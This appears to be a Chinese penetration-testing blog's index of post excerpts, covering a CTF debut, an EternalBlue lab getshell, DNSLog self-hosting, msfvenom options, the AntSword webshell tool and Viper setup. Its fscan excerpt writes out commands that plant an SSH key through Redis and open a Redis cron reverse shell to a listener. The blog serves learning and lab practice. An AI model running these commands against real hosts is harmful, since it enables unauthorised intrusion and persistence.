转眼大一已经过去了，然而大学生活才刚刚开始。回想 2021 年 10 月，我打的第一场 CTF 比赛，我参加了 Aurora 的新生赛，这是我参加的第一场比赛，那是我第一次接触网络安全。在那将近一天的时间里，我现学现卖，从我最擅长的 Web 题开始到需要捣鼓的 Misc 题，我完成了不少挑战，也在新生赛获得了不错的成绩，以此加入了深大的 Aurora 战队。 在篡权之后登录自己学校的靶场，发现之前的提交记录都被我干掉了，有点惋惜。 ...

红日靶场一有两种 Getshell 方式 方法一：木马反弹 shell 方法二：永恒之蓝 由于方法一过于简单，这里尝试使用 msf6 及永恒之蓝漏洞 在这之前可以使用 nmap 扫描一下端口开启情况，我这里直接使用 Goby 进行一个扫 ...

HVV 面试资料，文章整理匆忙，较为无序 ...

Dnslog 相信渗透的都不陌生，但我只是在 Apache Log4j 后才意识到这东西是有多好用 但是有些时候，知名的 dnslog.cn 网站就会崩溃。 既然这样，干脆就自己搭一个，但是过程十分艰辛。 由于我设置了 @* 解析，我就不需要再对 ns1.xxx.cn/ns2.xxx.cn 进行解析 具体如下 然后我们就接着物色 dnslog 平台 一个非常古老的 BugScanTeam 的 DNSLOG 于是乎，调了好久，6 年前的代码，还要改 cdn，还要改 ssl（开发组历史遗留问题） 最后改完了，发现一直 301，查看 issue 才发现要修改 SECURE_SSL_REDIRECT = False 然而，无论怎么修改数据库，还是进不去他的管理界面！ 之后只好另谋出路，最后…

Metasploit 一款开源安全漏洞检测工具，其不断更新的 Payload 使其成为了最强大的渗透框架之一 对于 MSFCONSOLE（简称 MSF），就不多赘述安装部署了，对于日常渗透使用一般可以再 Viper 中使用。 常见参数解读： -p, –payload <payload> 指定需要使用的 payload (攻击荷载)。也可以使用自定义 payload, 几乎是支持全平台的 -l, –list [module_type] 列出指定模块的所有可用资源。模块类型包括: payloads, encoders, nops, all -n, –nopsled < length> 为 payload 预先指定一个 NOP 滑动长度 -f, –format < form…

Github 仓库 蚁剑官方加载器 这是一款 Webshell 管理的基础软件，渗透的一切都是围绕 shell 进行的，内置的插件也能解决一些小问题 附一张成功 webshell 的截图 连接密码对应 webshell 的 POST 参数

Github 仓库 Fscan 是一款内网综合扫描工具，以下为常用命令 fscan -h 0.0.0.0/8 (全网段扫描) fscan -h 192.168.1.1/24 (默认使用全部模块) fscan -h 192.168.1.1/16 (B 段扫描) 其他用法 fscan -h 192.168.1.1/24 -np -no -nopoc (跳过存活检测 、不保存文件、跳过 web poc 扫描) fscan -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥) fscan -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹 shell) fscan -h 19…

前导 Viper 中文炫彩蛇，为图形化的渗透平台，用户可以使用浏览器登录完成诸如 (覆盖初始访问 / 持久化 / 权限提升 / 防御绕过 / 凭证访问 / 信息收集 / 横向移动等大类) 操作，并提供内网隧道，文件管理，命令行等常用渗透工具。 在进行内网渗透中，还有内网网络拓扑等可视化工具提高工作效率。 安装 快捷部署有 Docker 和 F8X 一键部署两种方式 下方为 f8x 一件部署，推荐在全新 linux 环境中使用 curl -o f8x https://f8x.io/ # wget -O f8x https://f8x.io/bash f8x -viper 我所使用的时 Docker 安装，并在 wsl (Docker on desktop) 和 linux (CentOS 7) 系统下都…